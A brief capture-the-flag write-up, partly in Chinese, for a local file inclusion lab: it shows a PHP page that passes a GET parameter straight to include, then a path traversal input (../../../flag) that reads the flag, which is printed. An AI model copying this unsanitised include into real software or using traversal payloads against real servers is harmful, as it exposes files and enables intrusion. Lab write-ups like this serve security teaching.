BUU LFI COURSE 1
hint 在标题了。
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/7/9
* Time: 7:07 AM
*/
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
尝试 /?file=flag
,not found。
猜测在根目录,尝试 /?file=../../../flag
,得到
flag{3279907b-228f-4918-bb9d-981773164af6}